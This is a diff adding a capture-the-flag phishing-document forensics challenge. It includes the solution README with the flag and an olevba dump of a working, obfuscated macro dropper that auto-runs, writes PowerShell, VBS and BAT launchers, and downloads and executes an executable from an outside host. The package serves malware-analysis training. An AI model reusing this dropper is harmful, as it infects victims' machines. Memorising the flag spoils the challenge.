diff --git a/forensics/giveaway/Pipfile b/forensics/giveaway/Pipfile
new file mode 100644
index 0000000..af54851
--- /dev/null
+++ b/forensics/giveaway/Pipfile
@@ -0,0 +1,12 @@
+[[source]]
+url = "https://pypi.org/simple"
+verify_ssl = true
+name = "pypi"
+
+[packages]
+oletools = "*"
+
+[dev-packages]
+
+[requires]
+python_version = "3.9"
diff --git a/forensics/giveaway/Pipfile.lock b/forensics/giveaway/Pipfile.lock
new file mode 100644
index 0000000..261ecd0
--- /dev/null
+++ b/forensics/giveaway/Pipfile.lock
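Review bot: The `oletools = "*"` entry under `[packages]` in the Pipfile leaves the analysis tool unconstrained, so any later `pipenv lock` or `pipenv update` moves to whatever release is current, while the committed lock and the macros.vba header both record 0.60. Pinning it in the Pipfile as `oletools = "==0.60"` keeps the extraction step reproducible. Installing with `pipenv sync` then uses the hashed lock exactly as committed.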
@@ -0,0 +1,161 @@ +{ + "_meta": { + "hash": { + "sha256": "05c72e7e1a8730ddb6e1c2f1b36ca17367b4584020b0c0b462958863fa93d803" + }, + "pipfile-spec": 6, + "requires": { + "python_version": "3.9" + }, + "sources": [ + { + "name": "pypi", + "url": "https://pypi.org/simple", + "verify_ssl": true + } + ] + }, + "default": { + "cffi": { + "hashes": [ + "sha256:00c878c90cb53ccfaae6b8bc18ad05d2036553e6d9d1d9dbcf323bbe83854ca3", + "sha256:0104fb5ae2391d46a4cb082abdd5c69ea4eab79d8d44eaaf79f1b1fd806ee4c2", + "sha256:06c48159c1abed75c2e721b1715c379fa3200c7784271b3c46df01383b593636", + "sha256:0808014eb713677ec1292301ea4c81ad277b6cdf2fdd90fd540af98c0b101d20", + "sha256:10dffb601ccfb65262a27233ac273d552ddc4d8ae1bf93b21c94b8511bffe728", + "sha256:14cd121ea63ecdae71efa69c15c5543a4b5fbcd0bbe2aad864baca0063cecf27", + "sha256:17771976e82e9f94976180f76468546834d22a7cc404b17c22df2a2c81db0c66", + "sha256:181dee03b1170ff1969489acf1c26533710231c58f95534e3edac87fff06c443", + "sha256:23cfe892bd5dd8941608f93348c0737e369e51c100d03718f108bf1add7bd6d0", + "sha256:263cc3d821c4ab2213cbe8cd8b355a7f72a8324577dc865ef98487c1aeee2bc7", + "sha256:2756c88cbb94231c7a147402476be2c4df2f6078099a6f4a480d239a8817ae39", + "sha256:27c219baf94952ae9d50ec19651a687b826792055353d07648a5695413e0c605", + "sha256:2a23af14f408d53d5e6cd4e3d9a24ff9e05906ad574822a10563efcef137979a", + "sha256:31fb708d9d7c3f49a60f04cf5b119aeefe5644daba1cd2a0fe389b674fd1de37", + "sha256:3415c89f9204ee60cd09b235810be700e993e343a408693e80ce7f6a40108029", + "sha256:3773c4d81e6e818df2efbc7dd77325ca0dcb688116050fb2b3011218eda36139", + "sha256:3b96a311ac60a3f6be21d2572e46ce67f09abcf4d09344c49274eb9e0bf345fc", + "sha256:3f7d084648d77af029acb79a0ff49a0ad7e9d09057a9bf46596dac9514dc07df", + "sha256:41d45de54cd277a7878919867c0f08b0cf817605e4eb94093e7516505d3c8d14", + "sha256:4238e6dab5d6a8ba812de994bbb0a79bddbdf80994e4ce802b6f6f3142fcc880", + "sha256:45db3a33139e9c8f7c09234b5784a5e33d31fd6907800b316decad50af323ff2", + 
"sha256:45e8636704eacc432a206ac7345a5d3d2c62d95a507ec70d62f23cd91770482a", + "sha256:4958391dbd6249d7ad855b9ca88fae690783a6be9e86df65865058ed81fc860e", + "sha256:4a306fa632e8f0928956a41fa8e1d6243c71e7eb59ffbd165fc0b41e316b2474", + "sha256:57e9ac9ccc3101fac9d6014fba037473e4358ef4e89f8e181f8951a2c0162024", + "sha256:59888172256cac5629e60e72e86598027aca6bf01fa2465bdb676d37636573e8", + "sha256:5e069f72d497312b24fcc02073d70cb989045d1c91cbd53979366077959933e0", + "sha256:64d4ec9f448dfe041705426000cc13e34e6e5bb13736e9fd62e34a0b0c41566e", + "sha256:6dc2737a3674b3e344847c8686cf29e500584ccad76204efea14f451d4cc669a", + "sha256:74fdfdbfdc48d3f47148976f49fab3251e550a8720bebc99bf1483f5bfb5db3e", + "sha256:75e4024375654472cc27e91cbe9eaa08567f7fbdf822638be2814ce059f58032", + "sha256:786902fb9ba7433aae840e0ed609f45c7bcd4e225ebb9c753aa39725bb3e6ad6", + "sha256:8b6c2ea03845c9f501ed1313e78de148cd3f6cad741a75d43a29b43da27f2e1e", + "sha256:91d77d2a782be4274da750752bb1650a97bfd8f291022b379bb8e01c66b4e96b", + "sha256:91ec59c33514b7c7559a6acda53bbfe1b283949c34fe7440bcf917f96ac0723e", + "sha256:920f0d66a896c2d99f0adbb391f990a84091179542c205fa53ce5787aff87954", + "sha256:a5263e363c27b653a90078143adb3d076c1a748ec9ecc78ea2fb916f9b861962", + "sha256:abb9a20a72ac4e0fdb50dae135ba5e77880518e742077ced47eb1499e29a443c", + "sha256:c2051981a968d7de9dd2d7b87bcb9c939c74a34626a6e2f8181455dd49ed69e4", + "sha256:c21c9e3896c23007803a875460fb786118f0cdd4434359577ea25eb556e34c55", + "sha256:c2502a1a03b6312837279c8c1bd3ebedf6c12c4228ddbad40912d671ccc8a962", + "sha256:d4d692a89c5cf08a8557fdeb329b82e7bf609aadfaed6c0d79f5a449a3c7c023", + "sha256:da5db4e883f1ce37f55c667e5c0de439df76ac4cb55964655906306918e7363c", + "sha256:e7022a66d9b55e93e1a845d8c9eba2a1bebd4966cd8bfc25d9cd07d515b33fa6", + "sha256:ef1f279350da2c586a69d32fc8733092fd32cc8ac95139a00377841f59a3f8d8", + "sha256:f54a64f8b0c8ff0b64d18aa76675262e1700f3995182267998c31ae974fbc382", + "sha256:f5c7150ad32ba43a07c4479f40241756145a1f03b43480e058cfd862bf5041c7", 
+ "sha256:f6f824dc3bce0edab5f427efcfb1d63ee75b6fcb7282900ccaf925be84efb0fc", + "sha256:fd8a250edc26254fe5b33be00402e6d287f562b6a5b2152dec302fa15bb3e997", + "sha256:ffaa5c925128e29efbde7301d8ecaf35c8c60ffbcd6a1ffd3a552177c8e5e796" + ], + "version": "==1.15.0" + }, + "colorclass": { + "hashes": [ + "sha256:b05c2a348dfc1aff2d502527d78a5b7b7e2f85da94a96c5081210d8e9ee8e18b" + ], + "version": "==2.2.0" + }, + "cryptography": { + "hashes": [ + "sha256:2049f8b87f449fc6190350de443ee0c1dd631f2ce4fa99efad2984de81031681", + "sha256:231c4a69b11f6af79c1495a0e5a85909686ea8db946935224b7825cfb53827ed", + "sha256:24469d9d33217ffd0ce4582dfcf2a76671af115663a95328f63c99ec7ece61a4", + "sha256:2deab5ec05d83ddcf9b0916319674d3dae88b0e7ee18f8962642d3cde0496568", + "sha256:494106e9cd945c2cadfce5374fa44c94cfadf01d4566a3b13bb487d2e6c7959e", + "sha256:4c702855cd3174666ef0d2d13dcc879090aa9c6c38f5578896407a7028f75b9f", + "sha256:52f769ecb4ef39865719aedc67b4b7eae167bafa48dbc2a26dd36fa56460507f", + "sha256:5c49c9e8fb26a567a2b3fa0343c89f5d325447956cc2fc7231c943b29a973712", + "sha256:684993ff6f67000a56454b41bdc7e015429732d65a52d06385b6e9de6181c71e", + "sha256:6fbbbb8aab4053fa018984bb0e95a16faeb051dd8cca15add2a27e267ba02b58", + "sha256:8982c19bb90a4fa2aad3d635c6d71814e38b643649b4000a8419f8691f20ac44", + "sha256:9511416e85e449fe1de73f7f99b21b3aa04fba4c4d335d30c486ba3756e3a2a6", + "sha256:97199a13b772e74cdcdb03760c32109c808aff7cd49c29e9cf4b7754bb725d1d", + "sha256:a776bae1629c8d7198396fd93ec0265f8dd2341c553dc32b976168aaf0e6a636", + "sha256:aa94d617a4cd4cdf4af9b5af65100c036bce22280ebb15d8b5262e8273ebc6ba", + "sha256:b17d83b3d1610e571fedac21b2eb36b816654d6f7496004d6a0d32f99d1d8120", + "sha256:d73e3a96c38173e0aa5646c31bf8473bc3564837977dd480f5cbeacf1d7ef3a3", + "sha256:d91bc9f535599bed58f6d2e21a2724cb0c3895bf41c6403fe881391d29096f1d", + "sha256:ef216d13ac8d24d9cd851776662f75f8d29c9f2d05cdcc2d34a18d32463a9b0b", + "sha256:f6a5a85beb33e57998dc605b9dbe7deaa806385fdf5c4810fb849fcd04640c81", + 
"sha256:f92556f94e476c1b616e6daec5f7ddded2c082efa7cee7f31c7aeda615906ed8" + ], + "markers": "python_version >= '3.6'", + "version": "==36.0.0" + }, + "easygui": { + "hashes": [ + "sha256:073f728ca88a77b74f404446fb8ec3004945427677c5618bd00f70c1b999fef2", + "sha256:8d38764803c27bbccab2771e6c021cb20647049b36617f765fac79f01af07a27" + ], + "version": "==0.98.2" + }, + "msoffcrypto-tool": { + "hashes": [ + "sha256:234f85ef59945fa1ebb618ca029f31f0cb43a637344dbda5c1bb8578b2d96a68", + "sha256:7f04b621365e3753f8cef8ba40536acc23d0d201c0ad2dcb1b3d82c83056b7ff" + ], + "markers": "python_version >= '3' and platform_python_implementation != 'PyPy' or (platform_system != 'Windows' and platform_system != 'Darwin')", + "version": "==4.12.0" + }, + "olefile": { + "hashes": [ + "sha256:133b031eaf8fd2c9399b78b8bc5b8fcbe4c31e85295749bb17a87cba8f3c3964" + ], + "markers": "python_version >= '2.7' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==0.46" + }, + "oletools": { + "hashes": [ + "sha256:bad54d3ced34f3475a5bffc0122f8481c66c3f3e09ad946dbda6ec80b75f72cb", + "sha256:dfad0328ac83b4f8db9f47e706cbd64db739ae4ebf9d98b2dcc465728a35f4a6" + ], + "index": "pypi", + "version": "==0.60" + }, + "pcodedmp": { + "hashes": [ + "sha256:025f8c809a126f45a082ffa820893e6a8d990d9d7ddb68694b5a9f0a6dbcd955", + "sha256:4441f7c0ab4cbda27bd4668db3b14f36261d86e5059ce06c0828602cbe1c4278" + ], + "version": "==1.2.6" + }, + "pycparser": { + "hashes": [ + "sha256:8ee45429555515e1f6b185e78100aea234072576aa43ab53aefcae078162fca9", + "sha256:e644fdec12f7872f86c58ff790da456218b10f863970249516d60a5eaca77206" + ], + "version": "==2.21" + }, + "pyparsing": { + "hashes": [ + "sha256:c203ec8783bf771a155b207279b9bccb8dea02d8f0c9e5f8ead507bc3246ecc1", + "sha256:ef9d7589ef3c200abe66653d3f1ab1033c3c419ae9b9bdb1240a85b024efc88b" + ], + "markers": "python_version >= '2.6' and python_version not in '3.0, 3.1, 3.2, 3.3'", + "version": "==2.4.7" + } + }, + "develop": {} +} 
diff --git a/forensics/giveaway/README.md b/forensics/giveaway/README.md
new file mode 100644
index 0000000..6829901
--- /dev/null
+++ b/forensics/giveaway/README.md
@@ -0,0 +1,34 @@
+# Giveaway
+
+Santa's SOC team is working overtime during December due to Christmas phishing
+campaigns. A new team of malicious actors is targeting mainly those affected by
+the holiday spirit. Could you analyse the document and find the command &
+control server?
+
+## Flag
+
+HTB{Th1s_1s_4_pr3s3nt_3v3ryb0dy_w4nts_f0r_chr1stm4s}
+
+## How to solve
+
+- The giveaway.docm file is a word file with enabled macros
+- Use oletools to extract any vba code `olevba -c christmas_giveaway.docm > macros.vba`
+- By analyzing the vba macro it is quite obvious which part is the obfuscated c&c address
+
+```vba
+Module VBModule
+ Sub Main()
+ Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String
+ HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4"
+ cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10)
+ fqtSMHFlkYeyLfs = Replace("everybody", "e", "3")
+ fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_"
+ ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95)
+ FVpHoEqBKnhPO = Replace("christmas", "i", "1")
+ FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6)
+ Console.WriteLine(HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO)
+ End Sub
+End Module
+```
+
+- Execute this part of the script in any vba online compiler and get the flag.
diff --git a/forensics/giveaway/christmas_giveaway.docm b/forensics/giveaway/christmas_giveaway.docm
new file mode 100644
index 0000000..489a248
Binary files /dev/null and b/forensics/giveaway/christmas_giveaway.docm differ
diff --git a/forensics/giveaway/macros.vba b/forensics/giveaway/macros.vba
new file mode 100644
index 0000000..5d374db
--- /dev/null
+++ b/forensics/giveaway/macros.vba
@@ -0,0 +1,317 @@ +olevba 0.60 on Python 3.9.8 - http://decalage.info/python/oletools +=============================================================================== +FILE: christmas_giveaway.docm +Type: OpenXML +------------------------------------------------------------------------------- +VBA MACRO ThisDocument.cls +in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' +- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - +Sub Auto_Open() + h +End Sub +Sub h() +Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR + USER = Environ("username") + PST1 = "adobeacd-update.p" + Chr(115) + "1" + BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t")) + ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl" + VBT1 = "adobeacd-update." + Chr(118) + "bs" + VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s" + + + MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 + ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad" + MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART + MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + XPFILEDIR = "c:\Windows\Temp\" + VBTXP + XPBARTFILEDIR = "c:\Windows\Temp\" + BART + + On Error Resume Next + SetAttr MY_FILENDIR, vbNormal + + If (Len(Dir(MY_FILENDIR)) <> 0) Then + Kill MY_FILENDIR + End If + + On Error Resume Next + SetAttr MY_FILEDIR, vbNormal + If (Dir(MY_FILEDIR) <> "") Then + Kill MY_FILEDIR + End If + + On Error Resume Next + SetAttr MY_FILDIR, vbNormal + If (Dir(MY_FILDIR) <> "") Then + Kill MY_FILDIR + End If + + On Error Resume Next + SetAttr XPFILEDIR, vbNormal + If (Dir(XPFILEDIR) <> "") Then + Kill XPFILEDIR + End If + + Dim FileNumber As Integer + Dim FileNumb As Integer + Dim FileNu As Integer + Dim mttt As Integer + Dim retVal As Variant + 'Dim winver As Integer + FileNumber = FreeFile + FileNumb = FreeFile + FileNu = FreeFile + + Dim 
objWMIService As Variant + Dim colOperatingSystems As Variant + Dim objOperatingSystem As Variant + Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") + Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") + For Each objOperatingSystem In colOperatingSystems + SysReport = SysReport & "The operating system on this computer is " & _ + objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")" + Next + + Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") + Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") + For Each objOperatingSystem In colOperatingSystems + winverstr = objOperatingSystem.Version + Next + + + winver = Val(winverstr) + WaitFor (1) + + +If (winver > 5.5) Then + Open MY_FILENDIR For Output As #FileNumber + Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';" + Print #FileNumber, "$hash = '0';" + Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;" + Print #FileNumber, "$url = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';" + Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';" + Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';" + Print #FileNumber, "$down" & "." 
& Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);" + Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;" + Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';" + Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';" + Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';" + Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';" + Print #FileNumber, "Start-Sleep -s 15;" + Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; " + Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force" + Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force" + Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force" + Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" + Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" + Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" + Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }" + Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }" + Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }" + Print #FileNumber, "Remove-Item $MyINvocation.InvocationName" + Close #FileNumber + + Open MY_FILDIR For Output As #FileNumb + Print #FileNumb, "Dim dff" + Print #FileNumb, "dff = 68" + Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))" + Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & 
"ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")" + Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34) + Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" + Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true" + Close #FileNumb + + Open MY_FILEDIR For Output As #FileNu + Print #FileNu, "@echo off" + Print #FileNu, "ping 1.1.2.2 -n 2" + Print #FileNu, "chcp 1251" + Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34) + Print #FileNu, "exit" + Close #FileNu + + SetAttr MY_FILENDIR, vbNormal + SetAttr MY_FILEDIR, vbNormal + SetAttr MY_FILDIR, vbNormal + + WaitFor (1) + + retVal = Shell(MY_FILEDIR, 0) +End If + +If (winver <= 5.5) Then + Open XPBARTFILEDIR For Output As #FileNu + Print #FileNu, "@echo off" + Print #FileNu, "ping 1.1.2.2 -n 2" + Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) + Print #FileNu, "ping 1.1.2.2 -n 2" + Print #FileNu, "c:\Windows\Temp\444.exe" + Print #FileNu, ":loop" + Print #FileNu, "ping 1.1.2.2 -n 1" + Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop" + Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop" + Print #FileNu, 
"exit" + Close #FileNu + WaitFor (2) + mttt = 88 + + Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String + + HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4" + cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10) + fqtSMHFlkYeyLfs = Replace("everybody", "e", "3") + fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_" + ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95) + FVpHoEqBKnhPO = Replace("christmas", "i", "1") + FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6) + + Open XPFILEDIR For Output As #FileNumber + Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO" + Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34) + + Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." 
+ Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")" + Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False" + + Print #FileNumber, "objXMLHTTP.send() " + Print #FileNumber, "If objXMLHTTP.Status = 200 Then" + + Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") " + + Print #FileNumber, "objADOStream.Open " + Print #FileNumber, "objADOStream.Type = 1" + Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody " + Print #FileNumber, "objADOStream.Position = 0 " + Print #FileNumber, "objADOStream.SaveToFile strTecation " + Print #FileNumber, "objADOStream.Close " + Print #FileNumber, "Set objADOStream = Nothing " + Print #FileNumber, "End if " + Print #FileNumber, "Set objXMLHTTP = Nothing" + Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")" + Close #FileNumber + + WaitFor (1) + + retVal = Shell(XPBARTFILEDIR, 0) + + +End If + + + findTest + secondTest + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "<" & "sel" & "ect>" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "<" & "in" & "box>" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + For Each myStoryRange In ActiveDocument.StoryRanges + With myStoryRange.Find + .Text = "" + .Replacement.Text = " " + .Wrap = wdFindContinue + .Execute Replace:=wdReplaceAll + End With + Next myStoryRange + + +End Sub +Sub WaitFor(NumOfSeconds As Long) +Dim SngSec As Long +SngSec = Timer + 
NumOfSeconds + +Do While Timer < SngSec +DoEvents +Loop + +End Sub + +Sub AutoOpen() + Auto_Open +End Sub +Sub Workbook_Open() + Auto_Open +End Sub +Sub findTest() +Dim firstTerm As String +Dim secondTerm As String +Dim rrtt As Range +Dim selRange As Range +Dim selectedText As String + +Set rrtt = ActiveDocument.Range +firstTerm = "" +secondTerm = "" +ASKASAIEJ = "ask as8d j vnbnfghfthfth sad" +With rrtt.Find +.Text = firstTerm +.MatchWholeWord = True +.Execute +ASKUKKIEJ = "aasdlkasjdask as8d j vnbnfghfthfth sad" +rrtt.Collapse direction:=wdCollapseEnd +Set selRange = ActiveDocument.Range +selRange.Start = rrtt.End +.Text = secondTerm +.MatchWholeWord = True +.Execute +ASKSASADW = "asjldklas" +rrtt.Collapse direction:=wdCollapseStart +selRange.End = rrtt.Start +selectedText = selRange.Delete +End With +End Sub + +Sub secondTest() +Dim firstTerm As String +Dim secondTerm As String +Dim myRanget As Range +Dim yytt As Range +Dim selRanget As Range +Dim selectedTextt As String + +Set yytt = ActiveDocument.Range +firstTerm = "" +secondTerm = "" +ASKIEJSASAHBDJ = "ask as8d j asdasl;a adfsdvsdgsdfsdf sad" +With yytt.Find +.Text = firstTerm +.MatchWholeWord = True +.Execute +ASKIEJ = "ask as8d j vnbnfghfthfth sad" +yytt.Collapse direction:=wdCollapseEnd +ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a adfsdvsdgsdfsdf sad" +Set selRanget = ActiveDocument.Range +selRanget.Start = yytt.End +.Text = secondTerm +.MatchWholeWord = True +.Execute +ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a adfsdvsdgsdfsdf sad" +yytt.Collapse direction:=wdCollapseStart +selRanget.End = yytt.Start +selectedTextt = selRanget +selRanget.Font.Color = wdColorBlack +End With +End Sub + +
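Review bot: No handling guidance accompanies `christmas_giveaway.docm`, although this dump shows it is a live dropper rather than an inert puzzle file: `Auto_Open`, `AutoOpen` and `Workbook_Open` all lead to `h`, which writes scripts under the Temp directories and starts them with `Shell`, and the `winver > 5.5` branch fetches an executable from hiro-wish[.]com. I would add a README line such as `- Treat christmas_giveaway.docm as live malware: keep macros disabled, work in an isolated VM, and rely on olevba, which parses the file without running it.` The README could also say that the address to recover sits in the `winver <= 5.5` branch, since the other branch carries a different URL that is easy to mistake for the answer.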